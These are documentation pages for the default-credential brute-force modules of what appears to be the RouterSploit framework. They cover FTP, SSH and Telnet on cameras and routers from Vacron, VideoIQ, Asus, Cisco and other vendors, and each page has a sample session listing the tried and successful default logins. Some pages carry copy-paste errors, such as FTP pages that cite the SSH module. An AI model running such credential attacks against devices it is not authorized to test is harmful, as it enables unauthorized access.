================================================
FILE: docs/modules/creds/cameras/vacron/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Vacron Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/ftp_default_creds
rsf (Vacron Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/vacron/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Vacron Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/ssh_default_creds
rsf (Vacron Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/vacron/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Vacron Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/telnet_default_creds
rsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/videoiq/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/ftp_default_creds
rsf (VideoIQ Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/videoiq/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/ssh_default_creds
rsf (VideoIQ Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/videoiq/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/telnet_default_creds
rsf (VideoIQ Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/asmax/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Asmax Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/ftp_default_creds
rsf (Asmax Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/asmax/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Asmax Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/ssh_default_creds
rsf (Asmax Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/asmax/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Asmax Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/telnet_default_creds
rsf (Asmax Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/asus/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Asus Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/ftp_default_creds
rsf (Asus Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/asus/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Asus Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/ssh_default_creds
rsf (Asus Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/asus/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Asus Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/telnet_default_creds
rsf (Asus Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/belkin/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Belkin Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/ftp_default_creds
rsf (Belkin Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/belkin/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Belkin Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/ssh_default_creds
rsf (Belkin Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/belkin/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Belkin Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/telnet_default_creds
rsf (Belkin Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/bhu/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Bhu Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/ftp_default_creds
rsf (Bhu Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/bhu/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Bhu Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/ssh_default_creds
rsf (Bhu Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/bhu/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Bhu Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/telnet_default_creds
rsf (Bhu Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/billion/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Billion Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/ftp_default_creds
rsf (Billion Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/billion/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Billion Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/ssh_default_creds
rsf (Billion Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/billion/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Billion Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/telnet_default_creds
rsf (Billion Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/cisco/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Cisco Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/ftp_default_creds
rsf (Cisco Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/cisco/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Cisco Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/ssh_default_creds
rsf (Cisco Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/cisco/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Cisco Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/telnet_default_creds
rsf (Cisco Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/comtrend/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Comtrend Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/ftp_default_creds
rsf (Comtrend Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/comtrend/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Comtrend Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/ssh_default_creds
rsf (Comtrend Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
